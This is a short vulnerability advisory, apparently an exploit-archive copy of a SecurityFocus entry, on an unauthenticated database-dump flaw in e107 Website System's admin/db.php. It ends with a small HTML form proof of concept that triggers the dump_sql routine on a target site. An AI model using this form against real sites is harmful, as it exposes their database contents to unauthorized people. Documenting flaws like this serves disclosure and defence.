9 lines
No EOL
432 B
Text
9 lines
No EOL
432 B
Text
source: http://www.securityfocus.com/bid/8273/info
|
|
|
|
e107 Website System 'db.php' has been reported prone to an information disclosure vulnerability.
|
|
|
|
A remote attacker may exploit this vulnerability to invoke the dump_sql routine without prior authentication. Information returned to the attacker may be of a sensitive nature.
|
|
|
|
<form action="http://www.example.com/admin/db.php">
|
|
<input type=submit name="dump_sql">
|
|
</form> |